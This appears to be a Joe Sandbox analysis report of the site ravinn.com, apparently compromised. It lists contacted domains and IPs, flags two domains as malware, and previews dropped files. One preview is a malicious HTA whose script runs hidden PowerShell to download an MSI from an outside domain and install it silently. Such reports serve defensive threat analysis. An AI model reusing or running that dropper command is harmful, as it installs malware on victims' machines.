            https://ravinn.com/0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/js/isotope.pkgd.min.js0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/css/main.css?v=17434827590%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/js/splide.min.js0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2025/03/VEC_logo_RGB.png0%Avira URL Cloudsafe
            https://pptpooalfkakktl.com/clou?ts=17434827590%Avira URL Cloudsafe
            https://www.ravinn.com/cdn-cgi/challenge-platform/scripts/jsd/main.js0%Avira URL Cloudsafe
            https://dajajkfifofjfklaiotjapp.com/main99.js0%Avira URL Cloudsafe
            https://use.fontawesome.com/releases/v6.4.2/webfonts/fa-brands-400.woff20%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/js/splide-extension-auto-scroll.js0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.20%Avira URL Cloudsafe
            https://www.ravinn.com/0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%Avira URL Cloudsafe
            https://static.klaviyo.com/onsite/js/sharedUtils.db6638454dfe7d02bbcd.js?cb=10%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/css/bootstrap.css?v=17434827590%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/logo1.png0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2024/01/cropped-favicon-32x32.png0%Avira URL Cloudsafe
            https://use.fontawesome.com/releases/v6.4.2/webfonts/fa-solid-900.woff20%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2024/01/044-R141223.jpg0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/12/strategy.jpg0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/logo3.png0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/veterans.png0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/logo4.png0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/logo2.png0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2024/01/QS_logo_large-1-e1705392262535.png0%Avira URL Cloudsafe
            https://www.ravinn.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2024/01/AITC.png0%Avira URL Cloudsafe
            https://static.klaviyo.com/onsite/js/klaviyo.js?company_id=WnvUEf0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/The-Latest.svg0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2024/01/Data3.png0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/logo5-e1701428252408.png0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.10%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/css/all.css0%Avira URL Cloudsafe
            https://use.fontawesome.com/releases/v6.4.2/css/all.css?ver=6.4.20%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/js/bootstrap.js?v=17434827590%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/The-Team.svg0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/ravinnlogo.svg0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/About-Ravinn.svg0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/js/script.js?v=17434827590%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/australia.svg0%Avira URL Cloudsafe
            https://www.ravinn.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?0%Avira URL Cloudsafe
            https://static.klaviyo.com/onsite/js/runtime.d6f8c2852d4e7a72345c.js?cb=10%Avira URL Cloudsafe
            https://www.ravinn.com/cdn-cgi/challenge-platform/h/b/jsd/r/0.13947569542610058:1743546722:XhkVEFcVpPyR6yRfblILygkLVlr83O0qYD2eB3d9Uy8/929bd11d2dfa7ced0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2024/01/logo.png0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/Incident-Response.jpg0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/style.css?ver=6.7.20%Avira URL Cloudsafe
            https://static-tracking.klaviyo.com/onsite/js/fender_analytics.611d7935dc9085329d0a.js?cb=10%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/Ravinn-desktop-1600x800-1.mp40%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/uploads/2023/11/Cyber-Threat-Intelligence.jpg0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/css/splide.min.css0%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/css/responsive.css?v=17434827590%Avira URL Cloudsafe
            https://www.ravinn.com/wp-content/themes/ravinn/js/loadmore.js?ver=6.7.20%Avira URL Cloudsafe
            https://a.nel.cloudflare.com/report/v4?s=AKIYVtpkxi6wFWDOCiDq%2F%2FqncE8m%2BcH0Fp0sSELAW9JxdGfukyNJRV5oZ6iCR4DO9qKy1vupP1UzEs82AX6%2Bupm%2FiMM6MK3415QGvnf4JU%2FrthdXsp8nJSPF12fbdg9vuw%3D%3D0%Avira URL Cloudsafe
            https://servverifcloud.com/100%Avira URL Cloudmalware
            https://hitiotppppalfkjfk.com/84.fqo0%Avira URL Cloudsafe
            https://mfktiaoaolfkfjzjk.com/plu100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            ravinn.com
            104.21.64.1
            truefalse
              unknown
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                klaviyo-app.map.fastly.net
                151.101.130.133
                truefalse
                  high
                  o-9999.o-msedge.net
                  13.107.140.254
                  truefalse
                    unknown
                    use.fontawesome.com.cdn.cloudflare.net
                    104.21.27.152
                    truefalse
                      high
                      www.ravinn.com
                      104.21.48.1
                      truefalse
                        unknown
                        mfktiaoaolfkfjzjk.com
                        104.21.69.191
                        truetrue
                          unknown
                          dajajkfifofjfklaiotjapp.com
                          104.21.16.1
                          truefalse
                            unknown
                            hitiotppppalfkjfk.com
                            104.21.3.74
                            truefalse
                              unknown
                              www.google.com
                              172.217.165.132
                              truefalse
                                high
                                arm-9999.arm-msedge.net
                                4.150.240.254
                                truefalse
                                  high
                                  servverifcloud.com
                                  104.21.16.1
                                  truetrue
                                    unknown
                                    pptpooalfkakktl.com
                                    104.21.80.1
                                    truefalse
                                      unknown
                                      klaviyo-onsite.map.fastly.net
                                      151.101.66.133
                                      truefalse
                                        high
                                        use.fontawesome.com
                                        unknown
                                        unknownfalse
                                          high
                                          static-tracking.klaviyo.com
                                          unknown
                                          unknownfalse
                                            high
                                            static.klaviyo.com
                                            unknown
                                            unknownfalse
                                              high
                                              NameMaliciousAntivirus DetectionReputation
                                              https://www.ravinn.com/wp-content/themes/ravinn/css/main.css?v=1743482759false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://dajajkfifofjfklaiotjapp.com/main99.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://pptpooalfkakktl.com/clou?ts=1743482759false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/themes/ravinn/js/isotope.pkgd.min.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2025/03/VEC_logo_RGB.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/themes/ravinn/js/splide.min.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.2false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/themes/ravinn/js/splide-extension-auto-scroll.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://use.fontawesome.com/releases/v6.4.2/webfonts/fa-brands-400.woff2false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/themes/ravinn/css/bootstrap.css?v=1743482759false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://static.klaviyo.com/onsite/js/sharedUtils.db6638454dfe7d02bbcd.js?cb=1false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2024/01/044-R141223.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/logo1.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2024/01/cropped-favicon-32x32.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/12/strategy.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://a.nel.cloudflare.com/report/v4?s=AKIYVtpkxi6wFWDOCiDq%2F%2FqncE8m%2BcH0Fp0sSELAW9JxdGfukyNJRV5oZ6iCR4DO9qKy1vupP1UzEs82AX6%2Bupm%2FiMM6MK3415QGvnf4JU%2FrthdXsp8nJSPF12fbdg9vuw%3D%3Dfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://use.fontawesome.com/releases/v6.4.2/webfonts/fa-solid-900.woff2false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/logo3.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/veterans.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://servverifcloud.com/true
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://static.klaviyo.com/onsite/js/klaviyo.js?company_id=WnvUEffalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2024/01/QS_logo_large-1-e1705392262535.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ravinn.com/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2024/01/AITC.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/logo4.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/The-Latest.svgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/logo2.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2024/01/Data3.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/logo5-e1701428252408.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/themes/ravinn/js/bootstrap.js?v=1743482759false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://use.fontawesome.com/releases/v6.4.2/css/all.css?ver=6.4.2false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/The-Team.svgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/themes/ravinn/css/all.cssfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/themes/ravinn/js/script.js?v=1743482759false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/ravinnlogo.svgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/About-Ravinn.svgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/australia.svgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://static.klaviyo.com/onsite/js/runtime.d6f8c2852d4e7a72345c.js?cb=1false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/cdn-cgi/challenge-platform/h/b/jsd/r/0.13947569542610058:1743546722:XhkVEFcVpPyR6yRfblILygkLVlr83O0qYD2eB3d9Uy8/929bd11d2dfa7cedfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2024/01/logo.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://static-tracking.klaviyo.com/onsite/js/fender_analytics.611d7935dc9085329d0a.js?cb=1false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/Incident-Response.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/Cyber-Threat-Intelligence.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/themes/ravinn/style.css?ver=6.7.2false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://mfktiaoaolfkfjzjk.com/plutrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://www.ravinn.com/wp-content/uploads/2023/11/Ravinn-desktop-1600x800-1.mp4false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://hitiotppppalfkjfk.com/84.fqofalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/themes/ravinn/css/splide.min.cssfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ravinn.com/wp-content/themes/ravinn/js/loadmore.js?ver=6.7.2false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://static-tracking.klaviyo.com/onsite/js/static.4b8f99d71b7685ee4f53.js?cb=1false
                                                high
                                                https://www.ravinn.com/wp-content/themes/ravinn/css/responsive.css?v=1743482759false
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.21.48.1
                                                www.ravinn.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                151.101.130.133
                                                klaviyo-app.map.fastly.netUnited States
                                                54113FASTLYUSfalse
                                                142.250.80.110
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.65.163
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                149.248.78.209
                                                unknownCanada
                                                36445COEXTRO-01CAfalse
                                                184.31.69.3
                                                unknownUnited States
                                                20940AKAMAI-ASN1EUfalse
                                                104.21.64.1
                                                ravinn.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                104.21.69.191
                                                mfktiaoaolfkfjzjk.comUnited States
                                                13335CLOUDFLARENETUStrue
                                                104.21.80.1
                                                pptpooalfkakktl.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                142.250.80.67
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.251.40.110
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.65.238
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                104.21.3.74
                                                hitiotppppalfkjfk.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                172.217.165.132
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                35.190.80.1
                                                a.nel.cloudflare.comUnited States
                                                15169GOOGLEUSfalse
                                                151.101.66.133
                                                klaviyo-onsite.map.fastly.netUnited States
                                                54113FASTLYUSfalse
                                                142.250.80.104
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                104.21.16.1
                                                dajajkfifofjfklaiotjapp.comUnited States
                                                13335CLOUDFLARENETUStrue
                                                1.1.1.1
                                                unknownAustralia
                                                13335CLOUDFLARENETUSfalse
                                                142.251.179.84
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.65.195
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.251.40.234
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.65.227
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                104.21.27.152
                                                use.fontawesome.com.cdn.cloudflare.netUnited States
                                                13335CLOUDFLARENETUSfalse
                                                142.250.72.110
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                IP
                                                192.168.2.16
                                                127.0.0.1
                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1654130
                                                Start date and time:2025-04-02 01:19:46 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                Sample URL:https://ravinn.com
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:27
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • EGA enabled
                                                Analysis Mode:stream
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.win@42/79@25/186
                                                • Exclude process from analysis (whitelisted): svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 142.250.80.110, 142.250.65.238, 142.250.65.195, 142.251.179.84, 142.250.81.238, 142.251.40.238
                                                • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: https://ravinn.com
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):11426
                                                Entropy (8bit):5.537471247147727
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:EFE0CA1EF8C039126259A0AFD17E021A
                                                SHA1:EBCD960ED46F1267D3B3C53C02AAA3738D240702
                                                SHA-256:6A79FA57FDF9D1EDFFFEAF44884121468E3D25DCAD2A9A9390F2D103931436E9
                                                SHA-512:650BAA45DCD9671528C96B8BFDF41A696DFD6CE0F4DE900E87F0206D16DB19861CA5132336214A3E68168B3505EF56849205B624FF59DBFECA64659DAF386E4A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:...@IXOS.@.....@...Z.@.....@.....@.....@.....@.....@......&.{E3205E05-7972-45C4-8321-B26BB5BCDBB2}..Sapor..7bc.msi.@.....@.....@.....@........&.{EB7E78DF-B6FA-49B0-B4FA-734224636FE8}.....@.....@.....@.....@.......@.....@.....@.......@......Sapor......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{EAB80571-66F3-4017-8A21-3D6195239CE3}&.{E3205E05-7972-45C4-8321-B26BB5BCDBB2}.@......&.{B225C053-A524-4B21-AB24-F0C6E6941AC4}&.{E3205E05-7972-45C4-8321-B26BB5BCDBB2}.@......&.{882C3412-68CA-4D6E-9AF2-9665DBF45098}&.{E3205E05-7972-45C4-8321-B26BB5BCDBB2}.@......&.{521916E8-CF74-4A28-AA1E-375724E4DD49}&.{E3205E05-7972-45C4-8321-B26BB5BCDBB2}.@........CreateFolders..Creating folders..Folder: [1]#.6.C:\Users\user\AppData\Roaming\userche userphate\Sapor\.@....#.=.C:\Users\user\AppData\Roaming\userche userphate\Sapor\32-bit\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1310720
                                                Entropy (8bit):0.8399755607806322
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:71E1D3FC2A0771EA20FBA05DE8ACE891
                                                SHA1:23040B9A0AB88DF220CFEF603393A503258646B7
                                                SHA-256:69EE543999C3D67E5A2B091F8BA3657B197BD6AB8FDB6CDC02F06694927999EB
                                                SHA-512:08911A81461C5258571509E321544D26A6DD50E806F6300E62CED05287CA455AFE4D6D4B8B9AD123893BDC4FDAD69A3724D056A204B285425DB620AD9FFA38D6
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):16384
                                                Entropy (8bit):0.08166326068432025
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:BF512EB7D4A37228D0C7DE3361F99C81
                                                SHA1:065F145DC460DB332A5A660E1378117927AB7406
                                                SHA-256:0408A93BAE0449810D66A96520659EFF9F300B8C167966610353BEC9B237196A
                                                SHA-512:49170B6B520F216BAB70F0DE22AFEA9C5FD4FD45A04C3B51C65881E01B13D1B7B8D30B9B76030DBFCC7CF121BDC9267964BE702DB4ADADB2214BB664D09DB188
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.V.......................................;...{.. ....}... ...{........... ...{... ...{..#.#.. ...{.|.................k.. ....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {EB7E78DF-B6FA-49B0-B4FA-734224636FE8}, Number of Words: 10, Subject: Sapor, Author: userche userphate, Name of Creating Application: Advanced Installer 18.0 build 1a235518, Template: x64;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                Category:modified
                                                Size (bytes):4763648
                                                Entropy (8bit):7.352413117443869
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:B6B9555EBF68E796D145148E309DD903
                                                SHA1:251E497C8D9CE04F7A83DA85C660582808F3F310
                                                SHA-256:B89FAAE246D09D9B21E1A49F6F3D7017109C71CA2BF2A7BF4A1BD817A991EA7D
                                                SHA-512:4A9202ABB4E8215C3BC6E9A0A004DD5386DAFC235BCC4DF137875DBF6D5C134793BDE67147A48534F52FEFA9DBEA9E391B2FF63B627D06CC356F3ECA5AE41128
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:......................>...................I...................................|...............................I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...{...|...}...~.......................................................................................................................................................................................................`...............%...7........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...5...2...3...4...8...6...>...@...9...:...;...<...=.......?...D...A...B...C.......E...^...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]......._...a...n...b...c...d...e...f...g...h...i...j...k...l...m...o.......p...q...r...s...t...u...v...w...x...y...z...
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):507847807
                                                Entropy (8bit):0.13406800870060365
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:5B0C25D9CBA1796E5514EDDB17083A3F
                                                SHA1:4441DBCB0EA411BBC05C69CC1FF17E66A34ED9E4
                                                SHA-256:F9D7C59B49C870EE131D54CE051D484C3928AD7FC3DAD9DD3B74E3AD09B2C28B
                                                SHA-512:AEDE22BC485090553639FC72D402CDE4C46064D15E641F8D29664DF871A1CC9AC92CABB957CB3235AB918B11759DE0BFE9E8FA0FCD6BA554BBE755FE0BFFF946
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p..c#..c#..c#.`"..c#.f"..c#.g"..c#..g"..c#..`"..c#..f"..c#Y}f"..c#.e"..c#.b"..c#..b#G.c#..j"..c#...#..c#...#..c#..a"..c#Rich..c#........PE..L....I.g...............$......6...................@..........................`D......E...@.......................................... ...U0...........D.xl....C......n.......................n......@m..@...............$............................text...z........................... ..`.rdata... ......."..................@..@.data........0......................@....rsrc....U0.. ...V0.................@..@.reloc........C......6C.............@..B........................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\mshta.exe
                                                File Type:HTML document, ASCII text, with very long lines (319)
                                                Category:dropped
                                                Size (bytes):758
                                                Entropy (8bit):4.914029573516563
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:13ECFBAB57992A1BE59284C8A4601B42
                                                SHA1:841D9DB3D513ACA644AFFA09AB35137C50AF896F
                                                SHA-256:20B9DB02112369AC4D93A88DACA28C32791F40C3D74CE21D863BC69CDEFED5D1
                                                SHA-512:AF509C792F617A9F53C5DFEB989B95547C3C8AAF4DE8AC0403AB30139904A4949ED2B6DC87B6815B13FAB5E7FFE0B76BB46F52129E71644EB79EF2B03AD901E1
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<!DOCTYPE html>.<html>.<head>. <hta:application. id="oHTA". border="thin". borderstyle="normal". contextmenu="no". maximizebutton="no". minimizebutton="no". navigable="no". scroll="no". showintaskbar="no". singleinstance="yes". sysmenu="no". windowstate="minimize". version="1.0". innerborder="no". >. <script>window.moveTo(-1,0)</script><script>window.onerror = function(){return true}</script><script>var s=new ActiveXObject("WScript.Shell");s.Run('powershell -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\\Users\\Public\\7bc.msi; msiexec /i C:\\Users\\Public\\7bc.msi /qn"',0,true);window.close();</script>..</head>.<body>.</body>.</html>..
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):15840
                                                Entropy (8bit):5.4358539282362965
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:661C65CC9757E4F1A75A3463C4C4D993
                                                SHA1:11ACFF59A2543BE83E15A86D444E5C22FA8CAD17
                                                SHA-256:EF96C14F00E775288B6DC9750481F4E42929E0059BF0C1F93619E3DB16BA9F9F
                                                SHA-512:33F5E75C80B93D6C1722858099851949501298ABB39F3172299ADE64F1FE4DEC1A2D42CCB811E85FEA0320E76C2F1527C62C2BABA0E45662B02F99F637C2E147
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:@...e...........c....................................@..........H...............o..b~.D.poM...J..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.2.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
                                                Process:C:\Users\user\AppData\Local\Inkberry\launchultra.exe
                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):101856
                                                Entropy (8bit):5.749821572382312
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:F61FA5CE25F885A9B1F549055C9911ED
                                                SHA1:ABA1C035B06017B0B0BD1C712669646E4F3765AB
                                                SHA-256:57E9675902B443085E37EAD57DFED97DE6BB61321682BC93AFF30F16B5CA5AEB
